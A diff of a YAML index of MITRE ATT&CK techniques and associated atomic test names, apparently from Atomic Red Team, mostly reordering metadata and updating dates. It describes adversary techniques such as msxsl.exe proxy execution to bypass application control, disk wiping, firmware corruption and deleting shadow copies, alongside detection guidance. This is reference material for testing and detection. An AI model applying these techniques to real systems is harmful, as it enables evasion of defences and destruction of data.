- Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses. Similar to [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)
+ Adversaries may abuse this functionality to execute arbitrary files while potentially bypassing application control. Similar to [Trusted Developer Utilities Proxy Execution](https://attack.mitre.org/techniques/T1127), the Microsoft common line transformation utility binary (msxsl.exe) (Citation: Microsoft msxsl.exe) can be installed and used to execute malicious JavaScript embedded within local or remote (URL referenced) XSL files. (Citation: Penetration Testing Lab MSXSL July 2017) Since msxsl.exe is not installed by default, an adversary will likely need to package it with dropped files. (Citation: Reaqta MSXSL Spearphishing MAR 2018) Msxsl.exe takes two main arguments, an XML source file and an XSL stylesheet. Since the XSL file is valid XML, the adversary may call the same XSL file twice. When using msxsl.exe adversaries may also give the XML/XSL files an arbitrary file extension.(Citation: XSL Bypass Mar 2019)
Command-line examples:(Citation: Penetration Testing Lab MSXSL July 2017)(Citation: XSL Bypass Mar 2019)
@@ -32988,33 +33958,33 @@ defense-evasion:
kill_chain_phases:
- phase_name: defense-evasion
kill_chain_name: mitre-attack
- modified: '2020-02-05T14:15:23.103Z'
+ modified: '2020-06-20T22:45:46.479Z'
created: '2018-10-17T00:14:20.652Z'
- x_mitre_version: '1.2'
- x_mitre_contributors:
- - Avneet Singh
- - Casey Smith
- - Praetorian
+ x_mitre_is_subtechnique: false
+ x_mitre_system_requirements:
+ - Microsoft Core XML Services (MSXML) or access to wmic.exe
+ x_mitre_platforms:
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
+
+ The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
+ x_mitre_defense_bypassed:
+ - Anti-virus
+ - Application control
+ - Digital Certificate Validation
x_mitre_data_sources:
- Process monitoring
- Process command-line parameters
- Process use of network
- DLL monitoring
- x_mitre_defense_bypassed:
- - Anti-virus
- - Application whitelisting
- - Digital Certificate Validation
- x_mitre_detection: |-
- Use process monitoring to monitor the execution and arguments of msxsl.exe and wmic.exe. Compare recent invocations of these utilities with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity (ex: URL command line arguments, creation of external network connections, loading of DLLs associated with scripting). (Citation: LOLBAS Wmic) (Citation: Twitter SquiblyTwo Detection APR 2018) Command arguments used before and after the script invocation may also be useful in determining the origin and purpose of the payload being loaded.
-
- The presence of msxsl.exe or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Windows
- x_mitre_system_requirements:
- - Microsoft Core XML Services (MSXML) or access to wmic.exe
- x_mitre_is_subtechnique: false
+ x_mitre_contributors:
+ - Avneet Singh
+ - Casey Smith
+ - Praetorian
+ x_mitre_version: '1.2'
identifier: T1220
atomic_tests:
- name: MSXSL Bypass using local files
@@ -33157,24 +34127,9 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- modified: '2019-10-14T23:29:24.908Z'
+ modified: '2020-07-14T19:15:29.911Z'
created: '2019-10-09T18:48:31.906Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Windows event logs
- - Process command-line parameters
- - Process monitoring
- x_mitre_permissions_required:
- - User
- - Administrator
- - root
- - SYSTEM
- x_mitre_impact_type:
- - Availability
- x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
x_mitre_detection: |-
Use process monitoring to monitor the execution and command line parameters of binaries involved in deleting accounts or changing passwords, such as use of [Net](https://attack.mitre.org/software/S0039). Windows event logs may also designate activity associated with an adversary's attempt to remove access to an account:
@@ -33184,6 +34139,22 @@ impact:
* Event ID 4740 - A user account was locked out
Alerting on [Net](https://attack.mitre.org/software/S0039) and these Event IDs may generate a high degree of false positives, so compare against baseline knowledge for how systems are typically used and correlate modification events with other indications of malicious activity where possible.
+ x_mitre_version: '1.0'
+ x_mitre_impact_type:
+ - Availability
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - root
+ - SYSTEM
+ x_mitre_data_sources:
+ - Windows event logs
+ - Process command-line parameters
+ - Process monitoring
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
identifier: T1531
atomic_tests:
- name: Change User Password - Windows
@@ -33315,6 +34286,21 @@ impact:
phase_name: impact
modified: '2020-03-29T02:01:10.832Z'
created: '2020-02-20T15:35:00.025Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_impact_type:
+ - Availability
+ x_mitre_detection: |-
+ Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
+
+ In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
+ x_mitre_data_sources:
+ - Network device logs
+ - Network device logs
+ - Network intrusion detection system
+ - Web application firewall logs
+ - Web logs
+ - SSL/TLS inspection
x_mitre_platforms:
- Linux
- macOS
@@ -33325,21 +34311,6 @@ impact:
- Office 365
- Azure AD
- SaaS
- x_mitre_data_sources:
- - Network device logs
- - Network device logs
- - Network intrusion detection system
- - Web application firewall logs
- - Web logs
- - SSL/TLS inspection
- x_mitre_detection: |-
- Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
-
- In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
- x_mitre_impact_type:
- - Availability
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
atomic_tests: []
T1499.004:
technique:
@@ -33367,6 +34338,20 @@ impact:
phase_name: impact
modified: '2020-03-29T02:07:27.508Z'
created: '2020-02-20T15:37:27.052Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_impact_type:
+ - Availability
+ x_mitre_detection: Attacks targeting web applications may generate logs in the
+ web server, application server, and/or database server that can be used to
+ identify the type of attack. Externally monitor the availability of services
+ that may be targeted by an Endpoint DoS.
+ x_mitre_data_sources:
+ - Network device logs
+ - Network intrusion detection system
+ - Web application firewall logs
+ - Web logs
+ - SSL/TLS inspection
x_mitre_platforms:
- Linux
- macOS
@@ -33377,20 +34362,6 @@ impact:
- Office 365
- Azure AD
- SaaS
- x_mitre_data_sources:
- - Network device logs
- - Network intrusion detection system
- - Web application firewall logs
- - Web logs
- - SSL/TLS inspection
- x_mitre_detection: Attacks targeting web applications may generate logs in the
- web server, application server, and/or database server that can be used to
- identify the type of attack. Externally monitor the availability of services
- that may be targeted by an Endpoint DoS.
- x_mitre_impact_type:
- - Availability
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
atomic_tests: []
T1485:
technique:
@@ -33439,29 +34410,29 @@ impact:
phase_name: impact
modified: '2020-03-27T21:08:19.783Z'
created: '2019-03-14T18:47:17.701Z'
- x_mitre_impact_type:
- - Availability
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - root
+ - SYSTEM
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - File monitoring
+ - Process command-line parameters
+ - Process monitoring
x_mitre_detection: Use process monitoring to monitor the execution and command-line
parameters of binaries that could be involved in data destruction activity,
such as [SDelete](https://attack.mitre.org/software/S0195). Monitor for the
creation of suspicious files as well as high unusual file modification activity.
In particular, look for large quantities of file modifications in user directories
and under C:\Windows\System32\.
- x_mitre_data_sources:
- - File monitoring
- - Process command-line parameters
- - Process monitoring
- x_mitre_version: '1.0'
- x_mitre_permissions_required:
- - User
- - Administrator
- - root
- - SYSTEM
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_impact_type:
+ - Availability
identifier: T1485
atomic_tests:
- name: Windows - Overwrite file with Sysinternals SDelete
@@ -33557,28 +34528,28 @@ impact:
phase_name: impact
modified: '2020-03-27T21:09:28.699Z'
created: '2019-03-15T13:59:30.390Z'
- x_mitre_version: '1.0'
- x_mitre_permissions_required:
- - User
- - Administrator
- - root
- - SYSTEM
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_is_subtechnique: false
+ x_mitre_impact_type:
+ - Availability
+ x_mitre_detection: |-
+ Use process monitoring to monitor the execution and command line parameters of of binaries involved in data destruction activity, such as vssadmin, wbadmin, and bcdedit. Monitor for the creation of suspicious files as well as unusual file modification activity. In particular, look for large quantities of file modifications in user directories.
+
+ In some cases, monitoring for unusual kernel driver installation activity can aid in detection.
x_mitre_data_sources:
- Kernel drivers
- File monitoring
- Process command-line parameters
- Process monitoring
- x_mitre_detection: |-
- Use process monitoring to monitor the execution and command line parameters of of binaries involved in data destruction activity, such as vssadmin, wbadmin, and bcdedit. Monitor for the creation of suspicious files as well as unusual file modification activity. In particular, look for large quantities of file modifications in user directories.
-
- In some cases, monitoring for unusual kernel driver installation activity can aid in detection.
- x_mitre_impact_type:
- - Availability
- x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ - Administrator
+ - root
+ - SYSTEM
+ x_mitre_version: '1.0'
atomic_tests: []
T1565:
technique:
@@ -33601,28 +34572,28 @@ impact:
phase_name: impact
modified: '2020-03-28T23:16:20.202Z'
created: '2020-03-02T14:19:22.609Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Packet capture
- - Network protocol analysis
- - File monitoring
- - Application logs
- x_mitre_detection: Where applicable, inspect important file hashes, locations,
- and modifications for suspicious/unexpected values. With some critical processes
- involving transmission of data, manual or out-of-band integrity checking may
- be useful for identifying manipulated data.
- x_mitre_impact_type:
- - Integrity
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
x_mitre_permissions_required:
- User
- Administrator
- root
- SYSTEM
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_impact_type:
+ - Integrity
+ x_mitre_detection: Where applicable, inspect important file hashes, locations,
+ and modifications for suspicious/unexpected values. With some critical processes
+ involving transmission of data, manual or out-of-band integrity checking may
+ be useful for identifying manipulated data.
+ x_mitre_data_sources:
+ - Packet capture
+ - Network protocol analysis
+ - File monitoring
+ - Application logs
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1491:
technique:
@@ -33645,20 +34616,10 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- modified: '2020-03-29T22:57:05.545Z'
+ modified: '2020-04-22T15:19:31.682Z'
created: '2019-04-08T17:51:41.390Z'
- x_mitre_data_sources:
- - Packet capture
- - Web application firewall logs
- - Web logs
- - Packet capture
- x_mitre_detection: "Monitor internal and external websites for unplanned content
- changes. Monitor application logs for abnormal behavior that may indicate
- attempted or successful exploitation. Use deep packet inspection to look for
- artifacts of common exploit traffic, such as SQL injection. Web Application
- Firewalls may detect improper inputs attempting exploitation.\n\n"
- x_mitre_impact_type:
- - Integrity
+ x_mitre_is_subtechnique: false
+ x_mitre_version: '1.1'
x_mitre_platforms:
- Linux
- macOS
@@ -33666,8 +34627,18 @@ impact:
- AWS
- GCP
- Azure
- x_mitre_version: '1.1'
- x_mitre_is_subtechnique: false
+ x_mitre_impact_type:
+ - Integrity
+ x_mitre_detection: "Monitor internal and external websites for unplanned content
+ changes. Monitor application logs for abnormal behavior that may indicate
+ attempted or successful exploitation. Use deep packet inspection to look for
+ artifacts of common exploit traffic, such as SQL injection. Web Application
+ Firewalls may detect improper inputs attempting exploitation.\n\n"
+ x_mitre_data_sources:
+ - Packet capture
+ - Web application firewall logs
+ - Web logs
+ - Packet capture
atomic_tests: []
T1498.001:
technique:
@@ -33698,20 +34669,12 @@ impact:
phase_name: impact
modified: '2020-03-29T01:10:52.360Z'
created: '2020-03-02T20:07:18.651Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- - AWS
- - GCP
- - Azure AD
- - SaaS
- - Azure
- - Office 365
- x_mitre_impact_type:
- - Availability
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Sensor health and status
+ - Network protocol analysis
+ - Netflow/Enclave netflow
+ - Network intrusion detection system
+ - Network device logs
x_mitre_detection: 'Detection of a network flood can sometimes be achieved before
the traffic volume is sufficient to cause impact to the availability of the
service, but such response time typically requires very aggressive monitoring
@@ -33724,15 +34687,40 @@ impact:
time may be small and the indicator of an event availability of the network
or service drops. The analysis tools mentioned can then be used to determine
the type of DoS causing the outage and help with remediation.'
- x_mitre_data_sources:
- - Sensor health and status
- - Network protocol analysis
- - Netflow/Enclave netflow
- - Network intrusion detection system
- - Network device logs
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_impact_type:
+ - Availability
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ - AWS
+ - GCP
+ - Azure AD
+ - SaaS
+ - Azure
+ - Office 365
atomic_tests: []
T1561.001:
technique:
+ created: '2020-02-20T22:06:41.739Z'
+ modified: '2020-03-28T22:53:20.162Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ type: attack-pattern
+ id: attack-pattern--fb640c43-aa6b-431e-a961-a279010424ac
+ description: |-
+ Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.
+
+ Adversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files.
+
+ To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)
+ name: Disk Content Wipe
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1561.001
@@ -33754,23 +34742,6 @@ impact:
description: Russinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved
December 13, 2017.
source_name: Microsoft Sysmon v6 May 2017
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Disk Content Wipe
- description: |-
- Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.
-
- Adversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware)(Citation: DOJ Lazarus Sony 2018) Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.(Citation: Novetta Blockbuster Destructive Malware) Adversaries have been observed leveraging third-party drivers like [RawDisk](https://attack.mitre.org/software/S0364) to directly access disk content.(Citation: Novetta Blockbuster)(Citation: Novetta Blockbuster Destructive Malware) This behavior is distinct from [Data Destruction](https://attack.mitre.org/techniques/T1485) because sections of the disk are erased instead of individual files.
-
- To maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: Novetta Blockbuster Destructive Malware)
- id: attack-pattern--fb640c43-aa6b-431e-a961-a279010424ac
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
- modified: '2020-03-28T22:53:20.162Z'
- created: '2020-02-20T22:06:41.739Z'
x_mitre_platforms:
- Linux
- macOS
@@ -33856,27 +34827,27 @@ impact:
phase_name: impact
modified: '2020-03-28T23:00:00.367Z'
created: '2020-02-20T22:10:20.484Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Kernel drivers
- - Process monitoring
- - Process command-line parameters
- x_mitre_detection: 'Look for attempts to read/write to sensitive locations like
- the master boot record and the disk partition table. Monitor for direct access
- read/write attempts using the \\\\.\\ notation.(Citation: Microsoft
- Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.'
- x_mitre_impact_type:
- - Availability
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
x_mitre_permissions_required:
- User
- Administrator
- root
- SYSTEM
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_impact_type:
+ - Availability
+ x_mitre_detection: 'Look for attempts to read/write to sensitive locations like
+ the master boot record and the disk partition table. Monitor for direct access
+ read/write attempts using the \\\\.\\ notation.(Citation: Microsoft
+ Sysmon v6 May 2017) Monitor for unusual kernel driver installation activity.'
+ x_mitre_data_sources:
+ - Kernel drivers
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1561:
technique:
@@ -33907,28 +34878,28 @@ impact:
phase_name: impact
modified: '2020-03-28T23:00:00.599Z'
created: '2020-02-20T22:02:20.372Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Kernel drivers
- - Process monitoring
- - Process command-line parameters
- x_mitre_detection: 'Look for attempts to read/write to sensitive locations like
- the partition boot sector, master boot record, disk partition table, or BIOS
- parameter block/superblock. Monitor for direct access read/write attempts
- using the \\\\.\\ notation.(Citation: Microsoft Sysmon v6 May
- 2017) Monitor for unusual kernel driver installation activity.'
- x_mitre_impact_type:
- - Availability
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
x_mitre_permissions_required:
- User
- root
- SYSTEM
- Administrator
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
+ x_mitre_impact_type:
+ - Availability
+ x_mitre_detection: 'Look for attempts to read/write to sensitive locations like
+ the partition boot sector, master boot record, disk partition table, or BIOS
+ parameter block/superblock. Monitor for direct access read/write attempts
+ using the \\\\.\\ notation.(Citation: Microsoft Sysmon v6 May
+ 2017) Monitor for unusual kernel driver installation activity.'
+ x_mitre_data_sources:
+ - Kernel drivers
+ - Process monitoring
+ - Process command-line parameters
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1499:
technique:
@@ -33999,17 +34970,13 @@ impact:
phase_name: impact
modified: '2020-03-29T02:07:27.676Z'
created: '2019-04-18T11:00:55.862Z'
- x_mitre_data_sources:
- - SSL/TLS inspection
- - Web logs
- - Web application firewall logs
- - Network intrusion detection system
- - Network protocol analysis
- - Network device logs
- - Netflow/Enclave netflow
- x_mitre_version: '1.0'
- x_mitre_impact_type:
- - Availability
+ x_mitre_is_subtechnique: false
+ x_mitre_detection: |-
+ Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
+
+ In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
+
+ Externally monitor the availability of services that may be targeted by an Endpoint DoS.
x_mitre_platforms:
- Linux
- macOS
@@ -34020,13 +34987,17 @@ impact:
- Office 365
- Azure AD
- SaaS
- x_mitre_detection: |-
- Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
-
- In addition to network level detections, endpoint logging and instrumentation can be useful for detection. Attacks targeting web applications may generate logs in the web server, application server, and/or database server that can be used to identify the type of attack, possibly before the impact is felt.
-
- Externally monitor the availability of services that may be targeted by an Endpoint DoS.
- x_mitre_is_subtechnique: false
+ x_mitre_impact_type:
+ - Availability
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - SSL/TLS inspection
+ - Web logs
+ - Web application firewall logs
+ - Network intrusion detection system
+ - Network protocol analysis
+ - Network device logs
+ - Netflow/Enclave netflow
atomic_tests: []
T1491.002:
technique:
@@ -34071,8 +35042,21 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- modified: '2020-03-28T22:35:27.602Z'
+ modified: '2020-04-22T15:19:31.380Z'
created: '2020-02-20T14:34:08.496Z'
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_impact_type:
+ - Integrity
+ x_mitre_detection: Monitor external websites for unplanned content changes.
+ Monitor application logs for abnormal behavior that may indicate attempted
+ or successful exploitation. Use deep packet inspection to look for artifacts
+ of common exploit traffic, such as SQL injection. Web Application Firewalls
+ may detect improper inputs attempting exploitation.
+ x_mitre_data_sources:
+ - Web logs
+ - Web application firewall logs
+ - Packet capture
x_mitre_platforms:
- Linux
- macOS
@@ -34080,22 +35064,20 @@ impact:
- AWS
- GCP
- Azure
- x_mitre_data_sources:
- - Web logs
- - Web application firewall logs
- - Packet capture
- x_mitre_detection: Monitor external websites for unplanned content changes.
- Monitor application logs for abnormal behavior that may indicate attempted
- or successful exploitation. Use deep packet inspection to look for artifacts
- of common exploit traffic, such as SQL injection. Web Application Firewalls
- may detect improper inputs attempting exploitation.
- x_mitre_impact_type:
- - Integrity
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
atomic_tests: []
T1495:
technique:
+ id: attack-pattern--f5bb433e-bdf6-4781-84bc-35e97e43be89
+ description: 'Adversaries may overwrite or corrupt the flash memory contents
+ of system BIOS or other firmware in devices attached to a system in order
+ to render them inoperable or unable to boot.(Citation: Symantec Chernobyl
+ W95.CIH) Firmware is software that is loaded and executed from non-volatile
+ memory on hardware devices in order to initialize and manage device functionality.
+ These devices could include the motherboard, hard drive, or video cards.'
+ name: Firmware Corruption
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- external_id: T1495
source_name: mitre-attack
@@ -34107,23 +35089,13 @@ impact:
description: Upham, K. (2014, March). Going Deep into the BIOS with MITRE
Firmware Security Research. Retrieved January 5, 2016.
source_name: MITRE Trustworthy Firmware Measurement
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Firmware Corruption
- description: 'Adversaries may overwrite or corrupt the flash memory contents
- of system BIOS or other firmware in devices attached to a system in order
- to render them inoperable or unable to boot.(Citation: Symantec Chernobyl
- W95.CIH) Firmware is software that is loaded and executed from non-volatile
- memory on hardware devices in order to initialize and manage device functionality.
- These devices could include the motherboard, hard drive, or video cards.'
- id: attack-pattern--f5bb433e-bdf6-4781-84bc-35e97e43be89
type: attack-pattern
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- modified: '2019-07-17T21:23:45.464Z'
+ modified: '2020-07-14T19:31:46.550Z'
created: '2019-04-12T18:28:15.451Z'
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Linux
- macOS
@@ -34174,32 +35146,33 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- modified: '2019-07-19T14:37:37.347Z'
+ modified: '2020-07-14T19:33:52.512Z'
created: '2019-04-02T13:54:43.136Z'
- x_mitre_contributors:
- - Yonatan Gotlib, Deep Instinct
- x_mitre_impact_type:
- - Availability
- x_mitre_detection: |-
- Use process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as vssadmin, wbadmin, and bcdedit. The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity.
-
- Monitor the status of services involved in system recovery. Monitor the registry for changes associated with system recovery features (ex: the creation of HKEY_CURRENT_USER\Software\Policies\Microsoft\PreviousVersions\DisableLocalPage).
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
+ x_mitre_permissions_required:
+ - Administrator
+ - root
+ - SYSTEM
+ - User
+ x_mitre_version: '1.0'
x_mitre_data_sources:
- Windows Registry
- Services
- Windows event logs
- Process command-line parameters
- Process monitoring
- x_mitre_version: '1.0'
- x_mitre_permissions_required:
- - Administrator
- - root
- - SYSTEM
- - User
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
+ x_mitre_detection: |-
+ Use process monitoring to monitor the execution and command line parameters of binaries involved in inhibiting system recovery, such as vssadmin, wbadmin, and bcdedit. The Windows event logs, ex. Event ID 524 indicating a system catalog was deleted, may contain entries associated with suspicious activity.
+
+ Monitor the status of services involved in system recovery. Monitor the registry for changes associated with system recovery features (ex: the creation of HKEY_CURRENT_USER\Software\Policies\Microsoft\PreviousVersions\DisableLocalPage).
+ x_mitre_impact_type:
+ - Availability
+ x_mitre_contributors:
+ - Yonatan Gotlib, Deep Instinct
identifier: T1490
atomic_tests:
- name: Windows - Delete Volume Shadow Copies
@@ -34332,23 +35305,23 @@ impact:
phase_name: impact
modified: '2020-03-29T22:57:04.784Z'
created: '2020-02-20T14:31:34.778Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_data_sources:
- - Web logs
- - Web application firewall logs
- - Packet capture
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: true
+ x_mitre_impact_type:
+ - Integrity
x_mitre_detection: Monitor internal and websites for unplanned content changes.
Monitor application logs for abnormal behavior that may indicate attempted
or successful exploitation. Use deep packet inspection to look for artifacts
of common exploit traffic, such as SQL injection. Web Application Firewalls
may detect improper inputs attempting exploitation.
- x_mitre_impact_type:
- - Integrity
- x_mitre_is_subtechnique: true
- x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Web logs
+ - Web application firewall logs
+ - Packet capture
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1498:
technique:
@@ -34395,25 +35368,7 @@ impact:
phase_name: impact
modified: '2020-03-29T01:11:28.903Z'
created: '2019-04-17T20:23:15.105Z'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- - AWS
- - GCP
- - Azure AD
- - SaaS
- - Azure
- - Office 365
- x_mitre_impact_type:
- - Availability
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - Sensor health and status
- - Network protocol analysis
- - Netflow/Enclave netflow
- - Network intrusion detection system
- - Network device logs
+ x_mitre_is_subtechnique: false
x_mitre_detection: 'Detection of Network DoS can sometimes be achieved before
the traffic volume is sufficient to cause impact to the availability of the
service, but such response time typically requires very aggressive monitoring
@@ -34426,7 +35381,25 @@ impact:
may be small and the indicator of an event availability of the network or
service drops. The analysis tools mentioned can then be used to determine
the type of DoS causing the outage and help with remediation.'
- x_mitre_is_subtechnique: false
+ x_mitre_data_sources:
+ - Sensor health and status
+ - Network protocol analysis
